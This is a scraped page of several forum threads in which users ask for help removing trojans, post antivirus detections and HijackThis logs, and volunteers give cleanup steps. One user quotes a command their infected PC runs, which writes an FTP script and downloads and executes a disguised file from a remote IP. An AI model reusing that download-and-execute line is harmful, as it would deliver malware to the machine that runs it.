Please do an online scan with Kaspersky Online Scanner:
Click on Kaspersky Online Scanner.
You will be prompted to install an ActiveX component from Kaspersky, click Yes.
The program will launch and then begin dow... Read more

9 more replies
Answer Match 67.2%

Hello Techguy,

AVG has identified and healed these viruses, but the #1 still emerges

Trojan Horse Downloader.Generic.NON
Trojan Horse Downloader.Zlob.QE
Virus identified Worm/VB.CC
Virus identified Java/ByteVerify

I have scanned PC with Ad-Aware, but it hasn't found anything.
I have switched to firefox and removed IE and MSNE from windows components
Added zonealarm (it blocks intruders. I didn't realize that there are so many connecting to my pc)

I am still getting system warnings from notification area. And consequently pop up IE ads. How come in IE if it is not installed anymore?

I would be very thankful if you could help.

Logfile of HijackThis v1.99.1
Scan saved at 14:12:47, on 11.4.2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\mssearchnet.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Utilities\ZoneAlarm\zlclient.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Acer\eManager\anbmServ.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\PROGRA~1\Grisoft\A... Read more

A:Solved: Trojan Horse (Downloader.Generic.NON and Zlob.QE) Hijack.log

10 more replies
Answer Match 67.2%

Hello,

I have a Dell with Windows XP SP2. As a virus program, I am running AVG. Almost every second day AVG finds the following:

File: !update.exe Type: Trojan horse Downloader.Generic 6 AEPH Location: C\Documents and Settings\user\Local Settings\Temp\\update.exe

File: NDR50.tmp Type: Trojan horse Downloader.Generic 6 AEPH Location: C\Documents and Settings\user\Local Settings\Temp\NDR50.tmp

File: NDR53.tmp Type: Trojan horse Downloader.Generic 6 AEPH Location: C\Documents and Settings\user\Local Settings\Temp\NDR53.tmp

File: !update-4495[1].0000 Type: Trojan horse Downloader.Generic 6 AEPH Location: C\Documents and Settings\user\Local\Temporary Internet Files\Content.IE5\F2HLC4L\Update-4495[1].000

It is moved to the Virus Vault, but it keeps coming back. Can someone help to get it out for good? It would be appreciated.
Thanks
 

A:!update.exe Type: Trojan horse Downloader.Generic 6 AEPH

Anybody out there who have an idea. Please, I cannot get rid of it.
 

1 more replies
Answer Match 66.78%

I have AVG free version 7.5 with all latest virus updates. It detects Downloader.Generic7.BDSL trojan horse with file names as 921.exe, 93.exe, 515.exe in c:\windows\system32\drivers folder. I am attaching my HJT log, please help me to remove this from my computer.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:45:34 AM, on 10/28/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\WINDOWS\ALCWZRD.EXE
C:\Program Files\Java\jre1.5.0_03\bin\jusched.exe
C:\Program Files\Messenger\msmsg... Read more

A:AVG free Version detects Downloader.Generic.BDSL Trojan Horse

Hello. I am PropagandaPanda (Panda or PP for short), and I will be helping you with your log.

I apologize for the delay in response. We get overwhelmed with logs at times, but we are trying our best to keep up. If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following so I can have a look at the current condition of your machine.

You may want to keep the link to this topic in your favourites. Alternatively, you can click the button at the top bar of this topic and Track this Topic, where you can choose email notifications. The topics you are tracking are shown here.

Please take note of some guidelines for this fix:
Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools. Doing so could cause changes to the directions I have to give you and prolong the time required. Furthermore, you should not be taking any advice relating to this computer from any other source throughout the course of this fix.
If you do not understand any step(s) provided, please do not hesitate to ask before continuing. I would much rather clarify instructions or explain them differently than have something important broken.
Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean". We do not want to clean you part-way, only... Read more

2 more replies
Answer Match 64.26%

HELLO, this is my first time posting at your site but I have followed your responses to others while researching software and problems on the Google search page. Your answers and instructions have been of great use and help to me.

Recently my computer started to run slow and I started seeing pop ups and messages saying my computer was infected. I checked my Avg Anti Virus and found seven items in the quarantine folder. The items were listed as Trojan Horse Generic 4.BO and a Trojan Horse Downloader Zlob.mcq. I ran Ad Aware and it found several items mostly cookies and Zango, which was removed. I then ran another scan and it came up clean. I ran a Panda Active scan and it found more infections. I have included the report with my HiJack log. I had a problem running a panda scan until I noticed a registry cleaner was blocking me from loading active x program needed by Panda. I was able to uninstall the program. I installed Spybot and it found even more infections such as Hot box, freeze.com and a registry change. At this point I now know I have a serious problem. Thank you in advance for any help you can provide me and my computer.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:54:23 PM, on 8/5/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16473)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\... Read more

A:Infected With Trojan Horse Generic 4.bo And Trojan Horse Downloader Zlob.mcq

Hello deb_girl, I am SifuMike and I will be helping you.

Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update.

Updating Java:
Download the latest version of Java Runtime Environment (JRE) 6u2.
Scroll down to where it says "Java Runtime Environment (JRE) 6u2".
Click the "Download" button to the right.
Check the box that says: "Accept License Agreement".
The page will refresh.
Click on the link to download Windows Offline Installation, Multi-language jre-6-windows-i586.exe and save to your desktop.
Close any programs you may have running - especially your web browser.
Go to Start > Control Panel double-click on Add/Remove programs and remove all older versions of Java.
Examples of older versions in Add or Remove Programs:
Java 2 Runtime Environment, SE v1.4.2
J2SE Runtime Environment 5.0
J2SE Runtime Environment 5.0 Update 6
Check any item with Java Runtime Environment (JRE or J2SE) in the name.
Click the Remove or Change/Remove button.
Repeat as many times as necessary to remove each Java version.
Reboot your computer once all Java components are removed.
Then from your desktop double-click on jre-6u2-windows-i586-p.exe to install the newest version.

******************

We are going to dig deeper, and that will require us to run some additional scans.
You will need to use Internet Explorer for this scan. D... Read more

5 more replies
Answer Match 63.42%

First off, I'd like to thank everyone who contributes to this forum. I just found it and I've already learned a lot from the stickies and other posts. I really appreciate the time put into it.

Now, I have a problem I was hoping to get some help with. I'm running Windows XP and for the past week my McAfee SecurityCenter has been reporting a lot of trojans/viruses/PUPs that have been removed or quarantined or that could not be repaired. Since this has happened, I've noticed my computer (especially web applications) running incredibly slowly from time to time for no obvious reason. I've also occasionally been redirected from websites that I frequent to websites I've never been to.

Below I've included a list of the items detected by McAfee and the actions it took (minus duplications) and a current HijackThis log. Any help would be appreciated, thanks.

Generic Dropper (quarantined)
Generic.dx (quarantined)
Generic Downloader (quarantined)
Generic.dx (removed)
Generic Dropper (removed)
Adware-PurityScan (cannot be repaired)
Downloader-BCF (removed)
Adware-ISM (removed)
Adware-BHO.gen.c (cannot be repaired)
Generic Pup.d (removed)
W32/Sdbot.worm (quarantined)
FakeAlert-AB!htm (removed)
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:59:24 PM, on 11/10/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16735)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winl... Read more

More replies
Answer Match 63%

Hello, my husband's computer seemed to contract quite a few trojans lately according to AVG free. I tried to use it to get rid of them, but I just wanted to check if it had done the job and if there is anything still lingering. Also I would like to prevent these infections happening again, as it seems a bit weird to me to have 5 different trojans at once. Can anyone say how the following trojans managed to download?

In temp folder: trojan horse generic 14.ABXY & trojan horse SHeur2.APYR

In system volume information _restore: trojan horse Downloader Generic 8.BJPU & another 14.ABXY

In temp internet files: trojan horse generic 13.BUBK

Thanks a lot for your time and please let me know if you need anymore info!! I appreciate it

DDS log:

DDS (Ver_09-07-30.01) - NTFSx86
Run by Gerard Sabapathy at 21:40:44.50 on 25/08/2009
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_13
Microsoft Windows XP Professional 5.1.2600.3.1252.44.1033.18.319.64 [GMT 2:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Java\jre6\bin&... Read more

A:Trying to get rid of trojans generic 14.ABXY, SHeur2.APYR, Downloader Generic 8.BJPU

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

2 more replies
Answer Match 62.16%

First of all would like to say hi to everyone at TSG!

Have been referred to this while using McAfeeHelp, my system is infected with New Malware.j / Generic Downloader.f & Downloader-AYL.

Every time I start my browser, McAfee pops with messages of files infected by the above. It is able to delete files infected by Generic Downloader.f & Downloader-AYL but not the ones by New Malware.j. My system's 'TASK MANAGER' is not working. I get a message that 'Task Manager has been disabled by your administrator'.

Have tried scanning with Spyware Doctor 2.0.1.143 & Ad-Aware SE Personal but of no help. Reading the previous threads, have downloaded HijackThis. Kindly assist, find below the log file of HijackThis.

Logfile of HijackThis v1.99.1
Scan saved at 2:35:07 PM, on 1/13/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\ALCWZRD.EXE
C:\WINDOWS\ALCMTR.EXE
C:\Program Files\Microsoft IntelliType Pro\type32.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe
C:\WINDOWS\s... Read more

A:Solved: Help Removing Trojans : New Malware.j / Generic Downloader.f / Downloader-AYL

13 more replies
Answer Match 62.16%

Hi everybody,

I have a machine that is running XP and it was just formatted. But it appears to have the Trojan-Downloader virus.
It tries to run a long command to do an ftp and download (I assume) other malicious files.
It disables the Firewall, then opens cmd and tries to run a command such as:

cmd /c echo OPEN 190.24.97.209 17848>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

It's not always the same command.
And then habilitates the firewall again.

Sometimes it also opens the task manager and tries to do something.

I have downloaded the hijackthis application and I'm attaching the log file after running it.
Can you guide me onto what should I do next?

Thanks.

Juliana

Logfile of HijackThis v1.99.1
Scan saved at 04:49:14 p.m., on 17/05/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Archivos de programa\iTunes\iTunesHelper.exe
C:\Archivos de programa\QuickTime\qttask.exe
C:\Archivos de programa\Java\jre1.6.0_01\bin\jusched.exe
C:\ARCHIV~1\SYMANT~1\SYMANT~1\vptray.exe
C:\Archivos de programa\Spyware Doctor\SDTrayApp.e... Read more

More replies
Answer Match 62.16%

My laptop has been infected with the Trojan.Generic virus.
After reading and reading I've realized that this is probably the best way to fix it.
Can somebody tell me what doesn't belong, haha.

Hijackthis file:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:22:49 PM, on 3/22/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16608)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\AVGGRI~1\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\AVGGRI~1\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\AVGGRI~1\AVGFRE~1\avgemc.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.e... Read more

More replies
Answer Match 62.16%

I was bombarded by several viruses/trojan horses/etc. early this morning. The majority of them were successfully quarantined. There is one (or maybe more than one) that is just being called "Trojan Horse" and nothing more specific. There isn't a particular virus/filename. The virus is attached to msasvc.exe in the c:/windows/system32/ file, and my virus scanner alert is reporting "access denied". Also, one of the reports looked like it had even infiltrated my system restore points, which to be quite frank, makes me want to cry.

*deep breath* Anyway, I've removed spyware from the registry before, when I had a specific filename to look for, but I have no idea what to do with this since it's just a generic threat. Additionally, when I tried to open Internet explorer to run symantec's virus scan (since I generally use Firefox for regular browsing), it would not open and gave me the error message "The application failed to start because msvcrl.dll was not found. Reinstalling the application may fix this problem." I don't know where msvcrl.dll has gone and run off to, especially since I haven't touched IE for at least a few months... and I certainly don't know what made it run away and how to fix it. HELP!!!!

Here's my HijackThisLog:

Logfile of HijackThis v1.99.1
Scan saved at 7:07:49 PM, on 1/13/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\... Read more

A:Generic "trojan Horse"... Help! My Hijackthis Log

Hello,

Your system is terribly infected. Problem with these infections nowadays is, it causes a lot of damage. Even if we clean the malware off your system, I can't guarantee that your system will be clean afterwards, because these infections/bundles leave a lot of leftovers behind that most scanners won't even recognise and logs won't show.

Also, I can't promise you we can repair all the damage it caused... Even after cleaning the malware, you can still get errors afterwards because of the damage. Solving these is not always possible since it will be searching for a needle in a haystack to find the right cause and solution.

So, we can try to clean this up and do what we can, but keep in mind that we can't solve ALL problems this malware already caused.

The current formatting of your log makes it difficult to read, so in notepad:
On top, click Format > uncheck Word Wrap

I also suspect the pe386 rootkit here.

It's better to print out the next instructions or save it in notepad, because you also have to work in safe mode without networking support, so this page wouldn't be available then.
It is also important you don't miss a step and perform everything in the right order!!

Uninstall AdwareFilter from software > add/remove programs, because this is a so called spyware remover with a bad reputation, present on the blacklist.

* Please download, install, and update AVG Anti-Spyware
Load AVG Anti-Spyware and then click the Update tab at the top. Under Manual Update click Start u... Read more

11 more replies
Answer Match 62.16%

A box keeps popping up asking me to run a csc.exe program. I keep saying no, but I cannot get rid of it. Please help. When I was running the hijack this a box popped up and said that it could not run in the "host" files and I needed to run as an administrator since I use vista. Is it complete or do I have to do something else?

I am somewhat computer literate, but I follow directions very well. I know the dangers of fools thinking they know it all. Thanks in advance for the help

Debbie

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:49:40 PM, on 9/13/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18294)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
C:\hp\support\hpsysdrv.exe
C:\Program Files (x86)\Java\jre6\bin\jusched.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuSchd2.exe
C:\Program Files (x86)\AVG\AVG8\avgtray.exe
C:\Program Files (x86)\Yahoo!\Messenger\ymsgr_tray.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files (x86)... Read more

A:a hijackthis log posted, generic trojan

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

2 more replies
Answer Match 62.16%

McAfee found those files and I am wondering if they are slowing down my computer. I am also having problems removing programs and installing Microsoft security updates. Whenever I try to remove certain programs I get a message that says, "This installation is forbidden by system policy. Contact your system administrator." My computer is a stand alone and I have admin privileges. Here is my log. Any help would be appreciated.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 2:51:38 PM, on 4/25/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16827)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\CheckPoint\SSL Network Extender\slimsvc.exe
C:\Program Files\Common Files\Creative Labs Shared\Service\CreativeLicen... Read more

A:Help removing Generic!Artemis, MK Recorder, and Generic Downloader

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.com
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the resul... Read more

2 more replies
Answer Match 61.74%

First of all would like to say hi to everyone at Tech Support!

Have been referred to this while using McAfeeHelp, my system is infected with New Malware.j / Generic Downloader.f & Downloader-AYL.

Every time I start my browser, McAfee pops up with messages of files infected by the above. It is able to delete files infected by Generic Downloader.f & Downloader-AYL but not the ones by New Malware.j. My system's 'TASK MANAGER' is not working. I get a message that 'Task Manager has been disabled by your administrator'.

Have tried scanning with Spyware Doctor 2.0.1.143 & Ad-Aware SE Personal but of no help. Reading the previous threads, have downloaded HijackThis. Kindly assist, find below the log file of HijackThis.

Logfile of HijackThis v1.99.1
Scan saved at 2:35:07 PM, on 1/13/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\ALCWZRD.EXE
C:\WINDOWS\ALCMTR.EXE
C:\Program Files\Microsoft IntelliType Pro\type32.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\Java\jre1.5.0_09\bin\jusche... Read more

A:Help Removing Trojans: New Malware.j / Generic Downloader.f / Downloader-AYL

Hello parry, and welcome to TSF


Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools,
then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.


Please read this post completely before beginning the fix. If there's anything that you do not understand, kindly ask your questions before proceeding.
Please ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this
webpage would not be available when you're carrying out the fix.


IT IS IMPORTANT THAT YOU DON'T MISS A STEP & PERFORM EVERYTHING IN THE RIGHT ORDER.

----------------------------------------

The fixes we will use are specific to your problems and should only be used for this issue on this machine.

Please only use this topic to reply to. Do not start another thread.
If any other issues arise let me know.

The process is not instant. Please continue to review my answers until I tell you your machine is clear.
Absence of symptoms does not mean that everything is clear. So let's do this to the end!

Please make every effort to reply to my posts in a timely manner. Malware breeds malware and the longer an infection remains on a system, the more
likely additional infections will result.

----------------------------------------

DOWNLOADS


CLEANUP! version 4.52 ? TEMP... Read more

14 more replies
Answer Match 61.74%

Logfile of HijackThis v1.99.0
Scan saved at 8:53:46 PM, on 1/30/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\igfxtray.exe
C:\WINDOWS\System32\hkcmd.exe
C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
C:\WINDOWS\LTMSG.exe
C:\Program Files\Java\j2re1.4.2_05\bin\jusched.exe
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe
C:\Program Files\MSN Apps\Updater\01.02.3000.1001\en-us\msnappau.exe
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\Yahoo!\browser\ybrwicon.exe
C:\Program Files\2Wire\2PortalMon.exe
C:\WINDOWS\System32\prvdi.exe
C:\WINDOWS\System32\ctfmon.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\PROGRA~1\Yahoo!\browser\ycommon.exe
C:\PROGRA~1\HEWLET~1\HPSHAR~1\hpgs2wnf.exe
C:\PROGRA~1\THEWEA~2\THEWEA~1.EXE
C:\WINDOWS\System32\wuauclt.exe
C:\PROGRA~1\INCRED~1\bin\IMAp... Read more

A:hELP READ HIJACKTHIS-GETTING DOWNLOADER-ME TROJAN

You MUST move HiJackThis.exe to a permanent folder like C:\HJT!!!

Print this and boot to safe mode
Fix these with HJT

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/cus.../search/ie.html

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://red.clientapps.yahoo.com/cus...//www.yahoo.com

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://69.50.160.100/

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://red.clientapps.yahoo.com/cus...//www.yahoo.com

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/cus.../search/ie.html

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://red.clientapps.yahoo.com/cus...//www.yahoo.com

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://69.50.160.100/

R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://red.clientapps.yahoo.com/cus...//www.yahoo.com

O2 - BHO: STIEbarBHO Class - {D797AD6C-6447-4DB4-91D0-090344408E72} - C:\Program Files\0CAT YellowPages\STIEbar.dll

O3 - Toolbar: 0CAT Yellow Pages - {679695BC-A811-4A9D-8CDF-BA8C795F261A} - C:\Program Files\0CAT YellowPages\STIEbar.dll

O4 - HKLM\..\Run: [Windows Service] C:\WINDOWS\System32\prvdi.exe

O4 - HKCU\..\Run: [Windows Service] C:\WINDOWS\System32\prvdi.exe

O9 - Extra button: My button - {47FE5D70-9AA2-40F1-9C6B-12A255F085EA} - C:\Program Files\0CAT Yel... Read more

2 more replies
Answer Match 61.74%

Hello folks, thanks for any help/advice....

I got rid of some Trojans, such as;
Trojan VX downloader,
Trojan VX 15, etc...

I just did a Hijack this, please look for me, and see if I need to
do any more, Please.

Thanks, Lee/caveman

Logfile of HijackThis v1.99.1
Scan saved at 8:09:16 AM, on 6/10/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\mcafee.com\antivirus\oasclnt.exe
